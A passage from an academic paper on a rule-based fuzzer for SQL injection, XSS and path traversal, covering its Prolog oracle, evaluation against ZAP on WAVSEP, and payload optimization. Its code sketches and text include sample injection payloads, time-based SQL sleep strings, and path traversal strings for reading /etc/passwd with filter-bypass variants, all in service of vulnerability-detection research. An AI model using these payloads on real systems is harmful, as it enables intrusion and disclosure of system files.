This type of attack is beneficial when several request parameters must be tested individually for the same type of vulnerability. It also makes efficiency straightforward to evaluate, as the number of performed HTTP requests is simply the number of placeholders multiplied by the number of payloads used.
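The following sketch shows the combinatorial core of the sniper attack from Definition 2: each injection point is fuzzed with every payload while the other points keep valid values, yielding n x m requests. Parameter names, valid values, and payloads are illustrative.

def sniper_attack(valid_params: dict, injection_points: list, fuzz_strings: list):
    for ip in injection_points:           # n injection points
        for fs in fuzz_strings:           # m fuzzing strings
            request = dict(valid_params)  # other points keep valid values
            request[ip] = fs
            yield request

valid = {"user": "alice", "q": "book"}
payloads = ["' OR 1=1--", "<script>alert(1)</script>"]
for req in sniper_attack(valid, ["user", "q"], payloads):
    print(req)  # 2 x 2 = 4 fuzzed requests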

5.5 Analyzer

Fig. 6: High-Level Architecture - Analyzer

The high-level structure of the Analyzer module is reported in Fig. 6. The aim of this component is to convert the collected fuzzing interactions into information understandable by the Oracle knowledge base. The heart of the vulnerability discovery phase is indeed the analysis of observations. To confirm a vulnerability, a security expert typically observes the differences between a valid HTTP response and the collected fuzzing responses. We replicate the same approach by comparing the performed HTTP interactions. As said, the Repeater module extracts the result of a valid HTTP interaction, whereas the Intruder module collects the information generated by the fuzzing phase.

After collecting the HTTP responses, the Intruder parses them to extract relevant information and check for the presence of potential vulnerabilities. We call such information HTTP interaction features.

Definition 3

(HTTP interaction features) Let:

  • \( \mathbb{H}\mathbb{I} \) the set of HTTP interactions obtained through a fuzzing attack;

  • \(i\in \mathbb{H}\mathbb{I}\) a single HTTP interaction;

  • \(p(i), i \in \mathbb{H}\mathbb{I} \) a parser function of the intruder module.

We define HTTP interaction features as the set of values returned by \(p(i)\).

We identify the following useful HTTP interaction features:

  • Payload Type: the categorized payload, namely SQLi, XSS, PT, or Normal (for valid HTTP interactions);

  • Payload String: the payload string utilized during the fuzzing attack;

  • HTTP status code: the HTTP response code associated with the sent HTTP request;

  • Content-Length: length in bytes of the obtained HTTP response;

  • Time-elapsed: elapsed time in microseconds from the time the HTTP request is sent to the time the associated response arrives;

  • Body response: the content of the HTTP response.

Payloads are categorized by the vulnerability being searched for. Categorization is performed to decrease the number of false positives. Such an approach mimics the methodology adopted by security experts to exclude false positives during their tests: after fuzzing the web application, obtaining the responses, and spotting a potential vulnerability, they verify whether the payloads used could actually trigger it. During the fuzzing attack, we collect the payload types, and the oracle selects a subset of rules from the knowledge base depending on the payload used. The Analyzer compares the features of valid and fuzzing interactions and generates what we define as Analyzer Observations.

Definition 4

(Analyzer Observations) Let:

  • \( \mathbb{H}\mathbb{I} \) the set of HTTP interactions obtained through a fuzzing attack;

  • \(i_{fuzz} \in \mathbb{H}\mathbb{I}\) a single HTTP interaction of the fuzzing attack;

  • \(i_{valid}\) a valid HTTP interaction;

  • \( f_{valid} \) the HTTP interaction features of \(i_{valid}\);

  • \(f_{i_{fuzz}}\) the HTTP interaction features of \(i_{fuzz}\).

Then, the Analyzer Observations are the set of observations returned by a function of \( f_{valid} \) and \(f_{i_{fuzz}}\): \(analyze(f_{valid}, f_{i_{fuzz}}) \)

The analyzer observations are the relevant observations commonly investigated by a security expert to verify the presence of a vulnerability. They are generated by comparing the HTTP interaction features of a valid HTTP interaction with those captured during a fuzzing attack.

During a security testing activity, security experts look for several strings within the response to confirm the presence of a vulnerability. For example, when performing an SQLi attack, they might be checking for the existence of string sequences like the following one: “You have an error in your SQL syntax”.

Another relevant analysis is about content length and elapsed time anomalies, which typically unveil the presence of blind-based vulnerabilities.

Based on the above considerations, the analyzer observations are essentially a formalized representation of the security expert’s analysis:

  • Relevant strings: tokens of interest extracted from the body of \(f_{i_{fuzz}}\);

  • Payload string: the payload field of \(f_{i_{fuzz}}\);

  • Payload Type: the payload type field of \(f_{i_{fuzz}}\);

  • HTTP status code: the return code field of \(f_{i_{fuzz}}\);

  • Anomalous Content-Length: a boolean value set based on the difference between the content-length field values associated, respectively, with \(f_{valid}\) and \(f_{i_{fuzz}}\). If such a difference is above a predefined threshold value, Anomalous Content-Length is set to true, false otherwise;

  • Anomalous response time delay: a boolean value set based on the difference between the elapsed time field values associated, respectively, with \(f_{valid}\) and \(f_{i_{fuzz}}\). If the difference is above a predefined threshold value, Anomalous response time delay is set to true, false otherwise.
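For concreteness, a simplified version of the analyze() comparison is sketched below; the threshold values and feature field names are illustrative assumptions rather than the configuration actually shipped with the fuzzer.

LENGTH_THRESHOLD = 500       # bytes; illustrative value
TIME_THRESHOLD = 3_000_000   # microseconds; illustrative value

def analyze(f_valid: dict, f_fuzz: dict, relevant_strings: list) -> dict:
    # Compare the features of a valid interaction with those of a fuzzed one
    # and emit the analyzer observations described above.
    return {
        "relevant_strings": [s for s in relevant_strings if s in f_fuzz["body"]],
        "payload_string": f_fuzz["payload"],
        "payload_type": f_fuzz["payload_type"],
        "status_code": f_fuzz["status_code"],
        "anomalous_content_length":
            abs(f_fuzz["content_length"] - f_valid["content_length"])
            > LENGTH_THRESHOLD,
        "anomalous_response_time":
            (f_fuzz["time_elapsed"] - f_valid["time_elapsed"]) > TIME_THRESHOLD,
    }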

5.6 Oracle

Fig. 7: High-Level Architecture - Oracle

The vulnerability discovery phase is accomplished through the Oracle module, which interacts with a vulnerability knowledge base to verify if the detected anomalies can be ascribed to the presence of vulnerabilities.

Hence, the vulnerability knowledge base leverages the logic programming declarative semantics to define a relationship between analyzer observations and vulnerabilities. The knowledge base is composed of terms, predicates, and rules categorized by the vulnerability type. Figure 7 shows the Oracle architecture. The Oracle module receives the analyzer observations and, based on the rules contained in the knowledge base, determines whether vulnerabilities exist in the tested web application. When considering the payload type, a specific subset of rules is activated. This means that the knowledge base rules are only triggered if they pertain to a particular vulnerability, as verified by checking the payload type used during the attack. To formalize these considerations, we introduce the concept of the vulnerability knowledge base.

Definition 5

(Vulnerability Knowledge Base)

Let:

  • \(\mathbb {T}\) the finite set of vulnerability types (SQL injection, XSS, etc.);

  • \(t \in \mathbb {T}\) a vulnerability type; vulnerability types in \(\mathbb {T}\) are pairwise distinct;

  • \(\mathbb {P} = \mathbb {T}\) the finite set of payload types;

  • \(\mathbb{A}\mathbb{O}\) a set of analyzer observations obtained from the execution of the analyze() function, with:

    • s the status code of \(\mathbb{A}\mathbb{O}\);

    • \(r\_s\) the relevant strings of \(\mathbb{A}\mathbb{O}\);

    • \(pt \in \mathbb {P}\) the payload type of \(\mathbb{A}\mathbb{O}\);

    • \(a_{content\_length}\) the anomalous content-length value of \(\mathbb{A}\mathbb{O}\);

    • \(a_{response\_time}\) the anomalous response time delay of \(\mathbb{A}\mathbb{O}\).

Then:

  • analyzer observations can be modeled as Prolog arguments. We call them vulnerability observations. We define \(\mathbb{V}\mathbb{O}\) as the set of vulnerability observations;

  • s, \(r\_s\), pt, \(a_{content\_length}\), \(a_{response\_time}\) values can be modeled as Prolog facts;

  • \(\mathbb {VKB}\) is a set of vr vulnerability rules;

  • \(\mathbb {VKB}_{t}\) is a subset of \(\mathbb {VKB}\) containing all the \(vr_{t}\) vulnerability rules for a given vulnerability type t;

  • the sets \(\mathbb {VKB}_{t}\) form a partition of \(\mathbb {VKB}\) (Footnote 2);

  • A vulnerability rule vr is a conjunction of a subset of vulnerability observations:

    $$\begin{aligned} vr = vo_{1} \wedge vo_{2} ... \wedge vo_{m} \end{aligned}$$

    where \(0 \le m \le \textbf{card}(\mathbb{A}\mathbb{O})\) and \(vo_{i} \in \mathbb{V}\mathbb{O}\);

  • The application is vulnerable to t when a \(vr_{t} \in \mathbb {VKB}_{t} \) is true;

  • An application is vulnerable when at least one vulnerability rule is true. This property can be modeled as a disjunction of vulnerability rules:

    $$\begin{aligned} is\_vulnerable = vr_{1} \vee vr_{2} \vee \dots \vee vr_{m} \end{aligned}$$
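To make the definition concrete, the following sketch asserts a single, simplified SQLi vulnerability rule and two observation facts, then runs the Oracle query through the pyswip bindings for SWI-Prolog; the rule shown is an illustrative example, not an excerpt of our actual knowledge base.

from pyswip import Prolog

prolog = Prolog()

# Simplified vulnerability rule: an SQLi payload that surfaces a database
# error string in the response indicates an SQL injection vulnerability.
prolog.assertz(
    "is_vulnerable(sqli) :- payload_type(sqli), "
    "relevant_string('You have an error in your SQL syntax')"
)

# Facts derived from one set of analyzer observations.
prolog.assertz("payload_type(sqli)")
prolog.assertz("relevant_string('You have an error in your SQL syntax')")

# The Oracle query: does any rule for type sqli fire?
if list(prolog.query("is_vulnerable(sqli)")):
    print("SQL injection vulnerability confirmed")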

Oracle output (for which a sample excerpt is reported in Listing 4) is composed of the following fields:

  • idFuzz: session’s fuzzing identifier;

  • Request: the HTTP request used for fuzzing;

  • Response: the HTTP response generated by the fuzzing attack;

  • TypePayload: the type of payload used during the fuzzing attack;

  • Payload: the specific payload string tested during the fuzzing attack;

  • Observation: an observation reported by the Analyzer;

  • Oracle: the Oracle response in terms of vulnerability rules fired as true.

Listing 4: A sample excerpt of the Oracle output

As mentioned previously, we have developed a process called the vulnerability knowledge base generation process to construct the vulnerability knowledge base. This involved analyzing abnormal behaviors observed during penetration tests conducted in academic labs that focused on input-handling vulnerabilities. In particular, we solved various PortSwigger labs (Footnote 3), which are known for their emphasis on input-handling vulnerabilities. Through this process, we continuously refined our knowledge base. Additionally, during our training sessions, we further enhanced the attack payloads by fine-tuning them. Algorithm 3 shows the vulnerability knowledge base generation process.

Algorithm 3: Vulnerability knowledge base generation process

We used the Sniper Attack with a predefined set of attack payloads. Failure in solving the lab might occur for two reasons:

  • the absence of a payload capable of triggering the vulnerability;

  • the absence of relevant analyzer observations that reveal the vulnerability.

Hence, after a lab failure, we repeated it by tuning both payloads and analyzer observations. At the end of the process, we performed a further optimization step to reduce the number of payloads and knowledge base rules as much as possible. We basically applied the well-known logic minimization [38] process to obtain the minimal number of rules.

Also, the payloads were fine-tuned by selecting the minimal set that triggers the vulnerabilities contained within the chosen labs.

6 Evaluation

In this section, we will present the performance metrics that we have defined to evaluate the effectiveness of our rule-based fuzzer. These metrics are used to assess the performance of our approach on a benchmark consisting of both vulnerable and non-vulnerable test cases. We will discuss the limitations and strengths of our approach and compare its performance with a well-known injection vulnerability scanner commonly used in the scientific community to detect vulnerabilities in web applications.

6.1 Benchmark and performance metrics

Our rule-based fuzzer was tested on a benchmark containing a set of test cases derived from the well-known WAVSEP (Web Application Vulnerability Scanner Evaluation Project) benchmark [39]. WAVSEP is a web application vulnerability benchmark designed to help assess the performance of web vulnerability scanners. We selected several input-handling test cases from the WAVSEP benchmark, namely:

  • 125 test cases vulnerable to SQLi;

  • 117 test cases vulnerable to PT;

  • 55 test cases vulnerable to XSS.

To evaluate the fuzzer performance in the absence of vulnerabilities, we extended the WAVSEP benchmark with 103 additional non-vulnerable test cases. To this purpose, we selected the latest version (version 5.6 at the time of writing) of WordPress, a widely used Content Management System for building web applications. We designated these test cases as non-vulnerable because no input-handling vulnerabilities were known for the specific version of WordPress used in our testing sessions.

Fuzz results are classified into:

  • True Positives — TP: vulnerable test cases that the rule-based fuzzer properly detects;

  • True Negatives — TN: non-vulnerable test cases that the rule-based fuzzer rightfully ignores;

  • False Positives — FP: non-vulnerable test cases that the rule-based fuzzer erroneously classifies as vulnerable;

  • False Negatives — FN: vulnerable test cases that the rule-based fuzzer erroneously classifies as non-vulnerable.

We define the following performance metrics:

  • Accuracy \( = \frac{TP+TN}{TP+TN+FP+FN}\)

  • Precision \( =\frac{TP}{TP+FP}\)

  • Recall \( = \frac{TP}{TP+FN}\)

Accuracy, precision, and recall can be defined as follows:

  • Accuracy: the proportion of correctly classified test cases, both vulnerable and non-vulnerable, to the total number of test cases;

  • Precision: the proportion of test cases correctly detected as vulnerable to the total number of test cases detected as vulnerable;

  • Recall: the proportion of test cases correctly detected as vulnerable to the total number of vulnerable test cases.

Accuracy is the most intuitive performance metric: it is simply the ratio of correctly classified test cases to the total number of test cases. However, high accuracy does not by itself imply good performance; the metric is most meaningful when false positives and false negatives are evenly distributed. High precision corresponds to a low false-positive rate. Finally, recall, also referred to as the true positive rate, measures how many of the vulnerable test cases were labeled as vulnerable. A high recall value implies a high vulnerability detection capability.

In addition to the performance metrics mentioned earlier, we have also defined a few additional support metrics to provide a more comprehensive evaluation of the rule-based fuzzer’s behavior. One such metric is efficiency, which measures the number of HTTP requests required to complete a fuzzing campaign. This metric helps us assess how efficiently the fuzzer performs in finding vulnerabilities. Another metric we use is the Number of Fuzzing Payloads (NFP), which indicates the level of optimization achieved by the fuzzer during the fuzzing session. This metric allows us to evaluate how effectively the fuzzer generates and uses different fuzzing payloads to maximize code coverage and vulnerability detection.

6.2 Rule-based fuzzer performance

The rule-based fuzzer was tested on the benchmark, and performance metrics were collected. Table 4 shows the metrics for each vulnerability type. It is possible to observe that the fuzzer has high accuracy on SQLi and PT vulnerabilities. The number of false positives is higher for XSS. The explanation for this behavior is that the rule-based fuzzer checks if an XSS string payload is reflected without analyzing the so-called “reflection context” [40].

Table 4 Rule-based fuzzer performance for specific vulnerabilities

We address this problem by adding a vulnerability rule that leverages a headless browser to check for the actual execution of JavaScript code, hence improving the discovery of cross-site scripting vulnerabilities, in the same way as indicated in [41]. Results with the additional rule are shown in Table 5.

Table 5 Enhanced rule-based fuzzer performance metrics for XSS vulnerabilities

6.3 Zed attack proxy comparison

OWASP Zed Attack Proxy (ZAP) [42] is a popular open-source web application security scanner that is widely used by professional penetration testers to identify vulnerabilities in web applications. It is considered to be a reliable alternative to commercial solutions, as it offers comparable performance. This has been confirmed in Chen’s dynamic application security testing solutions comparison [43], which recognized ZAP as an effective tool in this domain.

Figure 8 shows a comparison between the Rule-Based Fuzzer and Zed Attack Proxy performance metrics for each vulnerability type.

Fig. 8 Comparison between Rule-Based Fuzzer and ZAP

The results show similar accuracy for SQL injection vulnerabilities and better accuracy of the rule-based fuzzer for both XSS and PT vulnerabilities, although with lower precision. Concerning recall, the rule-based fuzzer performs better than ZAP for SQL injection, the figures are comparable for XSS, and it performs worse than ZAP for PT vulnerabilities. With reference to the above results, we observe that precision and recall could both be improved by tuning the vulnerability rules. The high level of accuracy, on the other hand, proves the effectiveness of the chosen payloads, as the vulnerabilities could not be triggered without proper payloads. With the current settings, the rule-based fuzzer outperforms ZAP in the case of cross-site scripting vulnerabilities. Tables 6 and 7 show the results in more detail.

Table 6 Comparison between rule-based fuzzer and ZAP: detailed figures
Table 7 Accuracy, precision and recall of rule-based fuzzer and ZAP

6.4 Strengths and limitations of the rule-based fuzzer

The performance of the rule-based fuzzer depends on the number and type of payloads used during fuzzing. A high number of payloads increases the vulnerability discovery rate but reduces efficiency. Table 8 shows how performance varies with the number of payloads used (the NFP parameter in the table).

Table 8 Rule-Based Fuzzer performance improvements for a greater number of payloads

The table shows that performance metrics improve as the number of payloads increases. A vulnerability is discovered when a payload alters the normal process of the target application by revealing a security flaw. Hence, the fuzzer has a better chance of triggering abnormal application behaviors if more payloads are used. However, more payloads lead to a decrease in efficiency.

Fig. 9 Accuracy-Request Trend

Table 9 Accuracy and number of requests versus the number of Payloads

Figure 9 and Table 9 show the relative trend between the number of payloads, the accuracy of the scanner, and the number of requests. For example, increasing the number of payloads from 77 to 143 yields only a 6% gain in accuracy while doubling the number of executed requests. The extensibility of the rule-based fuzzer allows changing the number of payloads by simply adding attack strings to the configuration file of the Analyzer module. Identifying the most suitable trade-off between the number of payloads and the scanner’s accuracy is therefore an integral part of the rule-based fuzzer’s instrumentation process.

Generally, it is important to underline a few intrinsic limitations of a rule-based approach. The vulnerability knowledge base has been implemented through the process described in Sect. 5. It is clearly possible to extend the process to other training scenarios and increase the system’s performance by adding new rules and assertions. However, the approach depends on the effectiveness of the knowledge base and requires continuous updates: as new attacks are devised on a daily basis, keeping pace with the required updates to the knowledge base can become very challenging. Another problem associated with the quality of the information contained in the knowledge base concerns the selection of “good-enough” fuzzing strings for triggering the entire set of target vulnerabilities. With reference to the points raised above, in the conclusions section we will propose some ideas to overcome the “static nature” of the rule-based approach.

7 Optimization strategies

The previous section analyzes the performance of the rule-based fuzzer and highlights the limitations of this approach. In this section, we will first discuss a couple of general performance enhancement criteria. Then, our focus will shift to the specific topic of payload optimization. Finally, we will introduce a few additional performance metrics.

7.1 Performance enhancements

As observed in Sect. 6.4, the performance metrics improve when a larger number of payloads is used. This behavior can be attributed to the coverage of more “feature classes” when more payloads are employed (we explain the concept of “feature class” in Sect. 7.2). However, increasing the number of payloads does not necessarily increase the precision metric, as it is influenced by the number of false positives. To mitigate the occurrence of false positives, it is possible to implement simple criteria that effectively decrease their number.

Performance Enhancement Criterion 1:

Compare the observations obtained by sending a valid payload with those obtained with the fuzzed payload.

This criterion aims to reduce the number of false positives by analyzing the response content, particularly for rules involving the analysis of strings. For example, consider a Path Traversal (PT) rule that aims to detect the presence of the “root” string in the response content, which would indicate that the web server may have disclosed the content of the “/etc/passwd” system file. However, it is important to note that the “root” string may also appear legitimately in the response content, for instance within code comments, as illustrated in Listing 5.

Listing 5 A response in which the “root” string appears inside a code comment

If the knowledge base rules check whether the trigger words already appear in the observed valid response, the number of false positives can be reduced. It is even more effective when the observations do not contain the words used to trigger a vulnerability in the first place. Continuing with the previous example, the “passwd” file often contains the word “sbin” in its content. This word is very specific and far less likely to be found in source code comments or other non-relevant areas. This forms the basis for the second criterion.

Performance Enhancement Criterion 2:

When triggering a rule based on the presence of a string in the content of an HTTP response, and there is a choice between two different words, opt for the more discriminant word, i.e., the one that minimizes the chances of being found in the content of the response to a valid request.
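A minimal sketch combining both criteria, under the assumption that requests are sent with the Python requests library (function and marker names are illustrative):

import requests

MARKERS = ["sbin", "root"]  # ordered from most to least discriminant

def path_traversal_suspected(url: str, param: str,
                             valid: str, fuzzed: str) -> bool:
    # Criterion 1: compare the baseline (valid payload) response with the
    # fuzzed one; Criterion 2: prefer the more discriminant marker.
    baseline = requests.get(url, params={param: valid}).text
    attacked = requests.get(url, params={param: fuzzed}).text
    for marker in MARKERS:
        if marker not in baseline and marker in attacked:
            return True  # marker appears only under the fuzzed payload
    return False

# e.g. path_traversal_suspected("http://target/app", "file",
#                               "report.txt", "../../../../etc/passwd")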

In Sect. 5.5, we emphasize the importance of considering the payload type to trigger the appropriate rules. This approach can also be extended to analyze the type of payloads being used and prevent the activation of irrelevant rules. For instance, when employing SQL payloads to detect SQL injection vulnerabilities, it is beneficial to distinguish between error-based and time-based payloads.

The rules within the oracle can evaluate conditions depending on the specific subcategory. For instance, the “anomalous time” check would not be triggered unless a “time-based” SQL payload is used.

Performance Enhancement Criterion 3:

Whenever possible, employ more fine-grained payload types and minimize the number of activated rules.
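A possible realization of this criterion, sketched in Python rather than in the Prolog knowledge base itself (rule and payload-type names are illustrative):

RULES_BY_PAYLOAD_TYPE = {
    "sql_error_based": {"sql_error_message", "error_status_code"},
    "sql_time_based":  {"anomalous_response_time"},
    "xss":             {"payload_reflected", "script_executed"},
}

def should_check(rule: str, payload_type: str) -> bool:
    # Activate a rule only if it is relevant for the payload subtype
    return rule in RULES_BY_PAYLOAD_TYPE.get(payload_type, set())

# should_check("anomalous_response_time", "sql_error_based") -> False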

By applying these straightforward criteria, it becomes possible to enhance the performance of the rule-based fuzzer. For the benchmark detailed in Sect. 6, Table 10 reports the improved statistics, clearly illustrating the desired performance enhancement.

Table 10 Increased rule-based fuzzer performance with optimization criteria

7.2 Payloads optimizations

As outlined in Sect. 6.4, augmenting the number of payloads correlates with improved performance metrics. This relationship stems from the payloads’ capacity to elicit the observations necessary for identifying vulnerabilities. Nevertheless, it is feasible to establish optimization techniques aimed at reducing the number of payloads while maintaining the same level of vulnerability detection performance. In this section, we expound on these strategies, which can be categorized into two groups:

  1. Payload Feature Optimization: these optimizations focus on enhancing the effectiveness of individual payloads by refining their features;

  2. Optimization through Web Application Enumeration: these optimizations revolve around the process of enumerating a web application to pinpoint vulnerabilities more efficiently.

7.2.1 Payload feature optimization

In a broader context, this category of optimization strategies can be subdivided into the following more specific subcategories:

  • Semantic Payload Generation: instead of generating a large number of random payloads, focus on generating payloads with specific semantic features that are more likely to trigger vulnerabilities. For instance, for SQL injection testing, you can create payloads that contain common SQL keywords or syntax patterns known to be effective in revealing vulnerabilities;

  • Dynamic Payload Generation: develop a dynamic payload generation mechanism that adapts payloads based on the application’s responses. Start with simple payloads and gradually increase complexity as you gather more information about the application’s behavior. This can help reduce the number of payloads needed while maintaining effective testing;

  • Payload Mutation Strategies: implement strategies for mutating existing payloads intelligently. Rather than creating entirely new payloads, modify existing ones by changing specific parts of the payload. This can lead to a more efficient use of payloads (see the sketch after this list).
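The following sketch illustrates the mutation idea; the transformations shown are common examples and not an exhaustive or prescriptive list:

import urllib.parse

def mutate(payload: str) -> list[str]:
    # Derive variants by rewriting specific parts of an existing payload
    variants = {
        payload.replace("'", '"'),        # swap quote style
        payload.swapcase(),               # defeat naive case-sensitive filters
        urllib.parse.quote(payload),      # URL-encode the whole payload
        payload.replace(" ", "/**/"),     # SQL comment as whitespace
    }
    variants.discard(payload)             # drop no-op mutations
    return sorted(variants)

# mutate("' OR '1'='1") -> a handful of cheap, feature-preserving variants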


The general observation is that each payload “stimulates” the web application in various ways, and each payload possesses specific characteristics that can be shared with other payloads. For instance, an SQL injection can be executed using a ‘sleep’ instruction, a single quote character, or a double quote character. Moreover, the payload might contain the valid payload string or replace it. Each condition can be considered a feature or characteristic of a payload, and these features can have categorical values. As a result, it is reasonable to expect that two payloads with identical characteristics will trigger the same anomalous observations. We can, hence, define features for payloads that allow us to categorize them into similar classes. A ‘feature class’ consists of payloads that share the same set of features.

Payload Optimization Criterion 1:

For each feature class, extract a single payload: the optimal payload set includes exactly one representative per feature class, thereby minimizing the total number of payloads while preserving feature coverage.
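A minimal sketch of this criterion (feature names and payload strings are illustrative):

from itertools import groupby

payloads = [
    {"s": "' OR SLEEP(5)-- -",    "quote": "single", "timing": True},
    {"s": "' OR '1'='1",          "quote": "single", "timing": False},
    {"s": '" OR "1"="1',          "quote": "double", "timing": False},
    {"s": "' OR pg_sleep(5)-- -", "quote": "single", "timing": True},
]

def feature_class(p: dict) -> tuple:
    return (p["quote"], p["timing"])

def optimal_set(payloads: list[dict]) -> list[str]:
    # Keep exactly one representative payload per feature class
    keyed = sorted(payloads, key=feature_class)
    return [next(group)["s"] for _, group in groupby(keyed, key=feature_class)]

# optimal_set(payloads) keeps 3 of the 4 payloads: the two time-based
# single-quote payloads share a feature class, so one is dropped.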

We draw from the extensive experience of web application penetration testers to define numerous features for each vulnerability. However, this approach is versatile and can be expanded to encompass any feature classification while also benefiting from the addition of further features.

XSS features

For cross-site scripting vulnerabilities, it is possible to identify several features. To trigger the vulnerability, the injected payload must be reflected within executable JavaScript code without causing errors. The valid payload is contingent upon the reflection context, i.e., the location where the input is reflected. The payload that ‘triggers’ the vulnerability is also influenced by the input sanitization methods employed by the web application to mitigate web attacks; indeed, for each defensive mechanism, it is possible to modify the payload to circumvent it [44]. Table 11 presents the list of analyzed features.

Table 11 XSS features

SQLi features

For SQL injection vulnerabilities, it is essential to categorize the input type. For instance, error-based or blind-based SQL injection attacks aim to generate an SQL syntax error, which would either display an SQL error message or return an error status code. In contrast, a time-based SQL injection attack attempts to execute an SQL ‘sleep’ command, creating a time delay in the web application that can be analyzed. The oracle can be fine-tuned by distinguishing between payload types (SQL or time-based SQL). Specifically, if the payload used is not time-based, a response delay will not be evaluated as an SQL injection condition.

Another critical feature to consider is the type of quotation mark used in the backend SQL queries. When a web application is vulnerable to SQL injection, the injected payload is inserted into an SQL query that retrieves data from the database. Typically, the input is injected into a ‘WHERE’ clause and can be enclosed in quotation marks, such as single or double quotes. As previously mentioned, an error-based SQL injection vulnerability can be exposed by causing an SQL syntax error in the web application. Therefore, if the injected payload is enclosed in double quotes, a payload that triggers an SQL syntax error must contain a double quote.Footnote 4

As this information is not usually deducible through information gathering,Footnote 5 a comprehensive payload set should encompass all possible quotation marks. Additionally, an important feature to consider is the underlying Database Management System (DBMS) in use. Each DBMS employs a specific SQL dialect with different instructions. For instance, PostgreSQL uses the pg_sleep() instruction to induce a delay, while MySQL uses SELECT SLEEP(). For each dialect, it is possible to define multiple payloads: if M is the number of payloads defined per dialect and N the number of dialects under examination, covering all possible databases requires \(M \times N\) payloads. Payload reduction can be achieved by employing the enumeration techniques described in Sect. 7.2.2.
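The dialect feature can be sketched as follows; the payload strings are illustrative, and the fingerprinting shortcut anticipates the enumeration techniques of Sect. 7.2.2:

SLEEP_PAYLOADS = {
    "mysql":      ["' AND SLEEP(5)-- -", '" AND SLEEP(5)-- -'],
    "postgresql": ["'; SELECT pg_sleep(5)-- -", '"; SELECT pg_sleep(5)-- -'],
    "mssql":      ["'; WAITFOR DELAY '0:0:5'-- -"],
}

def payloads_for(dbms: str | None) -> list[str]:
    if dbms in SLEEP_PAYLOADS:
        return SLEEP_PAYLOADS[dbms]   # DBMS known: only its dialect
    # DBMS unknown: the set must cover every dialect (M x N payloads)
    return [p for ps in SLEEP_PAYLOADS.values() for p in ps]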

Table 12 SQLi features

As with XSS vulnerabilities, the analysis of the sanitization techniques employed by the web application is crucial for SQL injection vulnerabilities [45]. Table 12 provides a summary of valuable features for SQL injection vulnerabilities.

PT features

To trigger a path traversal vulnerability, the injected payload must point to a readable and existing file. This type of vulnerability occurs due to flaws in a web application that allow arbitrary file reading. The specific file that constitutes a valid payload depends on the underlying operating system and web server interpreter. For instance, a valid file for PHP might be login.php, whereas for a Windows system it could be C:\Windows\System32\drivers\etc\hosts. In the context of path traversal vulnerabilities, the presence or absence of sanitization techniques that block special characters such as dots, backslashes, and slashes is a noteworthy feature, as it can significantly influence the variety of payloads needed to comprehensively test for this vulnerability [46]. Table 13 provides an overview of the analyzed features.

Table 13 PT features
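The sanitization-related features can be exercised by deriving filter-bypassing variants of a base traversal payload, as in the following illustrative sketch:

import urllib.parse

def traversal_variants(target: str = "etc/passwd", depth: int = 4) -> list[str]:
    prefix = "../" * depth
    plain = prefix + target
    return [
        plain,                                      # baseline payload
        plain.replace("/", "\\"),                   # backslash separators
        urllib.parse.quote(plain, safe=""),         # URL-encoded variant
        prefix.replace("../", "....//") + target,   # survives one "../" strip
    ]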

7.2.2 Optimization through web application enumeration

Payload reduction through Web Application Enumeration can happen in different ways:

  • Application Profiling: before conducting the fuzzing process, profile the target application thoroughly to identify its attack surface, input vectors, and potential vulnerabilities. This information can guide the selection of payloads, reducing the need for a large number of generic payloads;

  • Input Enumeration: enumerate and catalog all possible input points in the web application, including input fields, URLs, and headers. Prioritize testing these inputs over less critical ones (see the sketch after this list);

  • Response Analysis: analyze the application’s responses to initial requests to gain insights into its behavior. Identify patterns or anomalies that can help you craft more targeted payloads.
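A minimal sketch of the input enumeration step, assuming the Python requests and BeautifulSoup libraries (the selectors are deliberately simplistic):

from urllib.parse import urlparse, parse_qs
import requests
from bs4 import BeautifulSoup

def enumerate_inputs(url: str) -> list[str]:
    # Query-string parameters are injection points by definition
    points = list(parse_qs(urlparse(url).query))
    # Add named form fields found in the page
    soup = BeautifulSoup(requests.get(url).text, "html.parser")
    for form in soup.find_all("form"):
        points += [i.get("name") for i in form.find_all("input") if i.get("name")]
    return sorted(set(points))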

By incorporating these strategies into the fuzzing process, one can significantly reduce the number of payloads required while maintaining a high level of effectiveness in detecting vulnerabilities. This optimization can lead to more efficient and focused testing, especially in situations where generating a massive number of payloads is resource-intensive or time-consuming.

The effectiveness of payloads is also contingent upon the specific web application environment. For example, a path traversal payload designed for a Windows-based system would be ineffective against a Linux-based one. This underscores the importance of tailoring payloads to suit the target environment. It is worth noting that web application scanners are generally not optimized for environment analysis and payload selection. Instead, they typically employ a predefined set of payloads intended to trigger known vulnerabilities. Recent works [47, 48] have demonstrated the feasibility of formalizing penetration testing activities in terms of hacking goals. We have introduced an algorithm and a generic framework for integrating various actions and attacks, enabling the discovery of web vulnerabilities through an offensive approach. An effective method for improving web application security is to include enumeration actions before the fuzzing phase, utilizing the methodology we have proposed.

Through this approach, it is possible to infer the web application environment and consequently reduce the number of payloads. Once the enumeration phase is completed, attacks can be launched against the web application.

XSS footprinting

For cross-site scripting vulnerabilities, it is crucial to verify two conditions:

  1. the sent payload is reflected;

  2. the “reflection context” is an executable one.

In [40], we introduced the concept of the reflection context and demonstrated its utility in optimizing the number of requests. A similar approach can be applied in this work to identify cross-site scripting vulnerabilities. By analyzing where the input is reflected when a request is sent, it becomes possible to reduce the number of payloads to just a single one. However, several requests may need to be sent to properly understand the reflection context.
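A simplified sketch of such a probe, using a harmless unique marker and regex heuristics that are far coarser than a real HTML/JavaScript parser:

import re
import requests

MARKER = "zxqv13"

def reflection_context(url: str, param: str) -> str:
    body = requests.get(url, params={param: MARKER}).text
    if re.search(rf"<script[^>]*>[^<]*{MARKER}", body):
        return "script"      # already inside executable JavaScript
    if re.search(rf"=\s*[\"']?[^\"'>]*{MARKER}", body):
        return "attribute"   # inside a tag attribute value
    if MARKER in body:
        return "html"        # plain HTML text node
    return "not-reflected"

# The returned context determines the single payload to use.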

SQL and PT footprinting

If the DBMS in use is discovered, it is possible to reduce the number of payloads by excluding those that target other SQL dialects. Information disclosure vulnerabilities can reveal the DBMS in use and facilitate this optimization. For example, the presence of a PHPinfo file can disclose essential information such as the underlying DBMS and the operating system in use. Therefore, by detecting the DBMS in use, it is possible to exclude unnecessary payloads.

In the case of path traversal vulnerabilities, it is crucial to identify underlying systems, such as the operating system or the webserver running the web application. This knowledge allows for the exclusion of payloads designed to exploit vulnerabilities in different systems. For instance, if the underlying operating system is Linux, a payload attempting to exploit a path traversal vulnerability by reading the content of C:\Windows\System32\drivers\etc\hosts is ineffective. Therefore, discovering the underlying system permits payload optimization without compromising performance metrics.

7.2.3 Payload optimization: summary results

Tables 14, 15, and 16 display the quantity of payloads employed by ZAP, as well as by our rule-based fuzzer, both with and without the payload number reduction strategies detailed in Sect. 7.2.2.

Table 14 Number of payloads for XSS detection
